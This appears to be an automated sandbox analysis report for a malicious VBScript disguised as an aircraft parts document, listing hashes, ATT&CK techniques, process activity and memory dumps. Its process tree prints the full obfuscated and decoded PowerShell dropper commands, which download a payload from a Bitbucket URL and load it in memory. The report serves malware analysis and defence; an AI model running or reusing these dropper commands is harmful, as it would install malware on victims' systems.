43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae

General

Target

Aircraft PN#_Desc_&_Qty Details.vbs
Size

2.7MB
MD5

b6a6e732e7843e8af8468793eaaa294f
SHA1

4de793698450915e784e3a7f9df99b5b74241979
SHA256

43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae
SHA512

e37f804bb9020e51ac1ba8381aeda15ad5a2dde6ac875478fe0c5e6d3dbcebc38b6ee752604b21174b8198752219ed98e4bd423a0c24e1fa541d2d18c89b6e24
SSDEEP

768:pddddduddddddddduddddddddduddddddddduddddddddduddddddddduddddddo:TVKgi

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2212	powershell.exe
6	2212	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2116	powershell.exe
2212	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	bitbucket.org
5	bitbucket.org
6	bitbucket.org

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2116	powershell.exe
2212	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1952 wrote to memory of 2116	1952	WScript.exe	28
PID 1952 wrote to memory of 2116	1952	WScript.exe	28
PID 1952 wrote to memory of 2116	1952	WScript.exe	28
PID 2116 wrote to memory of 2212	2116	powershell.exe	30
PID 2116 wrote to memory of 2212	2116	powershell.exe	30
PID 2116 wrote to memory of 2212	2116	powershell.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Aircraft PN#_Desc_&_Qty Details.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bq▒GQ▒aQBs▒Go▒I▒▒9▒C▒▒Jw▒w▒DE▒Jw▒7▒CQ▒bwBv▒Gc▒dQB2▒C▒▒PQ▒g▒Cc▒JQBw▒Ho▒QQBj▒E8▒ZwBJ▒G4▒TQBy▒CU▒Jw▒7▒Fs▒QgB5▒HQ▒ZQBb▒F0▒XQ▒g▒CQ▒Z▒Bu▒Hk▒c▒B5▒C▒▒PQ▒g▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBD▒G8▒bgB2▒GU▒cgB0▒F0▒Og▒6▒EY▒cgBv▒G0▒QgBh▒HM▒ZQ▒2▒DQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒g▒Cg▒TgBl▒Hc▒LQBP▒GI▒agBl▒GM▒d▒▒g▒E4▒ZQB0▒C4▒VwBl▒GI▒QwBs▒Gk▒ZQBu▒HQ▒KQ▒u▒EQ▒bwB3▒G4▒b▒Bv▒GE▒Z▒BT▒HQ▒cgBp▒G4▒Zw▒o▒Cc▒a▒B0▒HQ▒c▒Bz▒Do▒Lw▒v▒GI▒aQB0▒GI▒dQBj▒Gs▒ZQB0▒C4▒bwBy▒Gc▒Lw▒1▒DU▒NgBn▒Gg▒ZgBo▒Gc▒ZgBo▒Gc▒Zg▒v▒GY▒Z▒Bz▒GY▒Z▒Bz▒GY▒LwBk▒G8▒dwBu▒Gw▒bwBh▒GQ▒cw▒v▒GQ▒b▒Bs▒Gg▒bwBw▒GU▒LgB0▒Hg▒d▒▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒Z▒Bu▒Hk▒c▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒w▒C8▒S▒BP▒Hk▒ZQB4▒C8▒cg▒v▒GU▒ZQ▒u▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒G8▒bwBn▒HU▒dg▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒agBk▒Gk▒b▒Bq▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Aircraft PN#_Desc_&_Qty Details.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jdilj = '01';$ooguv = 'C:\Users\Admin\AppData\Local\Temp\Aircraft PN#_Desc_&_Qty Details.vbs';[Byte[]] $dnypy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($dnypy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('0/HOyex/r/ee.etsap//:sptth' , $ooguv , '_______________________-------------', $jdilj, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7bb332eb40e3abe937d002eacb22c0ad

SHA1
894dc7a4d1209cb19a570267850bfd837d488133

SHA256
e3f044a45ad05d829d359d72c8fee930f0bb4d73b2e3a637cd3d4d6b01c43844

SHA512
d82a5844cdc16a5e2b285552447f82a70922e972aa9739a270004c521005c49da338b4d6a888c1d04dafb03487269bd29491011a5dfff71a343aed7630364799

Download Submit
memory/2116-4-0x000007FEF508E000-0x000007FEF508F000-memory.dmp

Filesize
4KB

Download
memory/2116-5-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/2116-7-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-6-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2116-8-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-9-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-10-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-11-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-17-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing